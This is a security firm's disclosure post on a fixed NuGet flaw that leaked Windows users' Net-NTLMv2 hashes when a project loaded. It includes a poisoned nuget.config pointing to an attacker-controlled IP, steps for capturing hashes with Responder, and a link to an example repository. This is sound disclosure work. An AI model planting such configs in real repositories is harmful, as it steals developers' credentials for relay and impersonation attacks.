Nuget Package Manager

8/20/2024

tl;dr
Earlier versions of Nuget Package Manager shipping with Visual Studio on Windows would leak a Net-NTLMv2 hash on port 80. This would happen on the Nuget Restore operation, which happens as soon as the project is cloned from a Git repo, or otherwise loaded. By poisoning a `nuget.config` file with an IP address of an attacker-controlled upstream repository, it would be possible to coerce or obtain the hashes of anyone cloning the repository.

Introduction
This is part one of a five-part blog post series focusing on NTLM-related research that was presented by two of our consultants, Tomais Williamson and Jim Rush, as part of the DEF CON 32 presentation (NTLM - the last ride) . After hearing the news that Microsoft is planning to kill off NTLM (New Technology Lan Manager) authentication in Windows 11 and above, we decided to speedrun forcing authentication and hashes out of a few more things before it fades into obscurity over the next twenty-five years or so.

So, what is NTLM?
NTLM stands for New Technology Lan Manager, and is the broad name given to the suite of protocols that have underpinned authentication within the Windows ecosystem for the last 30 or so years.

In the context of this research, it’s a password hash; a hash being the result of turning a cleartext password (Winter2024!) into a mangled version of itself for transmission over a network, to avoid sending the cleartext password.

While it is possible to brute-force weak passwords against known wordlists, the act of hashing a clear text string is like turning a cow into sausages – computationally expensive to get the cow back.

However, in an internal Active Directory network, being able to coerce a password hash allows for a variety of relay attacks which do not involve cracking the password. These attacks can allow for user impersonation within an environment. While there are mitigations and steps administrators can take to help reduce this risk, NTLM relaying still presents an excellent way for a malicious actor to laterally move or otherwise pivot around a network.

TrustedSec have a great and comprehensive blog post about the relaying attacks available: https://trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022

Now that we understand what an NTLM hash (or Net-NTLMV2) is, and how useful it can be to coerce them, let’s see what we can get them out of.

Nuget Package Manager
Nuget Package Manager (pronounced "New Get") is a package manager primarily used for packaging and distributing software written using .NET and the .NET Framework. Software packages are self-explanatory, reusable libraries of code that perform certain functions that developers can import into their own projects to save writing their own.

How Nuget Stores Credentials
As you can imagine, Nuget has some clear documentation surrounding secure storage of credentials.

The credentials are recommended to be stored or encrypted and set using the `packageSourceCredentials` node in the `nuget.config` file. Passwords are encrypted by default and are intended to be specified on a per-repository basis, either directly from the command line or using environment variables.

The documentation suggests that if a `packageSourceCredentials` node is not set or otherwise populated, Nuget should not pass credentials of any form to an upstream Nuget repository. However, it does, as we discovered.

Getting a hash out of Nuget:
We reported the below to the MSRC (Microsoft Security Research Centre) who deal with MS related vulnerabilities:

While the intended functionality of a `nuget.config` file is to create project specific Nuget configurations, by updating it to contain a malicious URL or IP address, it is possible to leak the Net-NTLMv2 hash via port 80 of the currently logged in user. This is possible, even without installing any Nuget packages, and happens when the project is loaded.

This also bypasses the security protection that flags the repository as unsafe as the HTTP request and NTLM negotiation happens before the repo is marked as trusted.

This means that it would be possible for a malicious actor with Git access within an organisation (such as a software developer) or with write access to an open-source .NET project, to update the project specific `nuget.config` file to point to an attacker-controlled URL. When the project is loaded or updated, an HTTP request is made to the URL and a NTLM challenge is completed, leaking the Net-NTLMv2 hash of the user opening Visual Studio. This might allow for a malicious actor to potentially steal hashes from a large portion of their development team. As it is a HTTP Net-NTLMv2 it is possible to relay to more places, but this was outside the scope of this research.

Additionally, as it is leaked on port 80 rather than 445, it is more likely to bypass firewall restrictions or other security controls.

Despite all those technical words for the benefit of the MSRC, the bug is somewhat straightforward:

User opens a project with a malicious package repo URL in the nuget.config file

Nuget attempts to authenticate to the malicious package repo when the project loads

A Net-NTLMv2 hash is passed from the nuget client to the attacker-controlled server

How this bug happened: ICredentials
While trying to figure out the root cause for MS of why Nuget was leaking credentials, we quickly came across the ICredentials interface.

This interface within .NET "provides the base authentication interface for retrieving credentials for Web client authentication". This interface provides the `GetCredential` method to objects that provide network credentials to applications and is used extensively throughout the Nuget codebase to handle authentication.

Within Nuget, there was a logic error that caused the package manager to retry a request after a 401 response, with the subsequent fallback to the Net-NTLM-v2 hash of the current user being passed in the second attempt.

Example `nuget.config` file
The below is an example of a poisoned `nuget.config` file, which can be used to coerce the hashes of anyone cloning the repository in VS on Windows:

<?xml version="1.0" encoding="utf-8"?>
<configuration>
    <packageSources>
        <!--To inherit the global NuGet package sources remove the <clear/> line below -->
        <clear />
        <add key="nuget" value="http://192.168.178.74/fresh/index.json" />
    </packageSources>
</configuration>

To reproduce this issue:

In a repository with a poisoned `nuget.config` file (where one of the `packageSources` is set to a server you control that presents a NTLM challenge), run `nuget.exe restore` from the command line.
Observe a Net-NTLMv2 hash captured on the server you are running Responder on.

An example repository containing an example poisoned nuget.config file can be found here:

https://github.com/JimSRush/NTLM_vanilla/blob/main/nuget.config

Hello, could I have 500 of my coworkers' hashes please?

Disclosure timeline:

03 March 2024: Vulnerability reported to MS
05 March 2024: MSRC opens a case for this issue
06-14 March 2024: Further evidence and PoC details provided to MS
14 March 2024: MS ‘unable to recreate’
15 March 2024: Further clarification on recreation steps provided
21 March 2024: MSRC accept bug for immediate servicing and class as ‘Important’
18 June 2024: Status changed from ‘pre-release' to ‘complete’

Releases

Nuget Package Manager

Want to know more? Contact us now.